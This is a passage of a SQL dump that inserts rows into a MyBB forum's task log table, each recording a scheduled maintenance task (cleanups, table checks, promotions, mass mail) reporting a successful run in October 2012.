INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10891', '1', '1350493243', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10892', '7', '1350493247', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10893', '5', '1350493604', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10894', '9', '1350493853', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10895', '5', '1350494876', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10896', '9', '1350494931', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10897', '3', '1350495097', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10898', '9', '1350495634', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10899', '5', '1350495949', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10900', '9', '1350496559', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10901', '3', '1350496833', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10902', '1', '1350496873', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10903', '7', '1350496932', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10904', '5', '1350497191', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10905', '9', '1350497410', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10906', '5', '1350498462', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10907', '9', '1350498516', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10908', '3', '1350498898', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10909', '9', '1350499248', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10910', '5', '1350499506', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10911', '9', '1350500103', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10912', '3', '1350500355', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10913', '1', '1350500401', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10914', '7', '1350500409', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10915', '5', '1350500720', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10916', '9', '1350501063', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10917', '5', '1350501906', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10918', '9', '1350501914', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10919', '3', '1350502202', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10920', '9', '1350502830', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10921', '5', '1350503118', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10922', '9', '1350503747', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10923', '3', '1350503949', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10924', '1', '1350504038', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10925', '7', '1350504091', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10926', '5', '1350504331', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10927', '9', '1350504684', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10928', '5', '1350505503', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10929', '9', '1350505635', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10930', '3', '1350505817', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10931', '9', '1350506456', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10932', '5', '1350506702', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10933', '9', '1350507370', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10934', '3', '1350508169', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10935', '1', '1350508183', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10936', '7', '1350508190', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10937', '5', '1350508341', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10938', '9', '1350508434', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10939', '5', '1350509108', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10940', '9', '1350509473', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10941', '3', '1350509484', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10942', '9', '1350510035', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10943', '5', '1350510310', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10944', '9', '1350511045', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10945', '3', '1350511143', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10946', '1', '1350511203', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10947', '7', '1350511249', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10948', '5', '1350511643', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10949', '9', '1350511921', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10950', '5', '1350513067', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10951', '9', '1350513122', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10952', '3', '1350513128', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10953', '9', '1350514095', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10954', '5', '1350514112', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10955', '9', '1350514545', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10956', '3', '1350515332', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10957', '1', '1350515338', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10958', '7', '1350515343', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10959', '5', '1350515363', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10960', '9', '1350515475', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10961', '5', '1350516345', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10962', '9', '1350516356', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10963', '3', '1350516618', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10964', '9', '1350517683', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10965', '5', '1350517739', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10966', '9', '1350519162', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10967', '3', '1350519178', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10968', '1', '1350519214', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10969', '2', '1350519251', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10970', '7', '1350519253', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10971', '11', '1350519268', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10972', '5', '1350519287', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10973', '5', '1350519903', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10974', '9', '1350520042', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10975', '3', '1350520385', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10976', '9', '1350520832', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10977', '5', '1350521103', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10978', '9', '1350521769', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10979', '3', '1350521955', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10980', '1', '1350522005', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10981', '7', '1350522083', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10982', '5', '1350522308', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10983', '9', '1350522614', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10984', '5', '1350523663', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10985', '9', '1350523666', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10986', '3', '1350523809', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10987', '9', '1350524480', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10988', '5', '1350524714', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10989', '9', '1350525321', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10990', '3', '1350525548', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10991', '1', '1350525607', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10992', '7', '1350525608', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10993', '5', '1350525905', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10994', '9', '1350526210', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10995', '5', '1350527102', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10996', '9', '1350527104', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10997', '3', '1350527418', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10998', '9', '1350528002', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10999', '5', '1350528303', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11000', '9', '1350528982', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11001', '3', '1350529148', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11002', '1', '1350529214', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11003', '7', '1350529220', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11004', '5', '1350529512', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11005', '9', '1350529806', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11006', '5', '1350530703', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11007', '9', '1350530717', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11008', '3', '1350531073', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11009', '9', '1350531670', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11010', '5', '1350531917', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11011', '9', '1350532507', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11012', '3', '1350532752', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11013', '1', '1350533040', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11014', '7', '1350533145', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11015', '5', '1350533145', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11016', '9', '1350534084', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11017', '5', '1350534307', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11018', '9', '1350534827', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11019', '3', '1350534927', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11020', '9', '1350536111', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11021', '5', '1350536116', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11022', '3', '1350536359', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11023', '1', '1350536431', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11024', '7', '1350536712', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11025', '5', '1350536716', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11026', '9', '1350537058', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11027', '5', '1350537907', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11028', '9', '1350540354', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11029', '3', '1350540367', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11030', '5', '1350540728', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11031', '1', '1350540827', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11032', '7', '1350540848', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11033', '9', '1350540871', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11034', '5', '1350541652', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11035', '9', '1350541662', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11036', '3', '1350541863', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11037', '9', '1350542667', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11038', '5', '1350542773', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11039', '9', '1350543307', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11040', '3', '1350543541', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11041', '1', '1350543607', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11042', '7', '1350543617', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11043', '5', '1350543906', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11044', '9', '1350544215', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11045', '5', '1350545151', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11046', '9', '1350545161', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11047', '3', '1350545403', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11048', '9', '1350546007', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11049', '5', '1350546345', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11050', '9', '1350546946', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11051', '3', '1350547144', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11052', '1', '1350547216', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11053', '7', '1350547233', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11054', '5', '1350547523', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11055', '9', '1350547840', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11056', '5', '1350548701', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11057', '9', '1350548734', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11058', '3', '1350549055', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11059', '9', '1350549629', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11060', '5', '1350549921', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11061', '9', '1350550514', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11062', '3', '1350550748', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11063', '1', '1350550802', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11064', '7', '1350550836', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11065', '5', '1350551105', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11066', '9', '1350551425', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11067', '5', '1350552344', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11068', '9', '1350552350', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11069', '3', '1350552608', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11070', '9', '1350553218', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11071', '5', '1350553503', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11072', '9', '1350554141', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11073', '3', '1350554357', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11074', '1', '1350554404', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11075', '7', '1350554427', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11076', '5', '1350554749', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11077', '9', '1350555270', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11078', '5', '1350555970', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11079', '9', '1350555988', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11080', '3', '1350556204', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11081', '9', '1350556816', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11082', '5', '1350557121', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11083', '9', '1350557729', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11084', '3', '1350558119', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11085', '1', '1350558205', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11086', '7', '1350558234', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11087', '5', '1350558302', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11088', '9', '1350558617', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11089', '5', '1350559524', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11090', '9', '1350559538', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11091', '3', '1350559903', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11092', '9', '1350560626', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11093', '5', '1350560840', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11094', '9', '1350561332', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11095', '3', '1350561601', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES 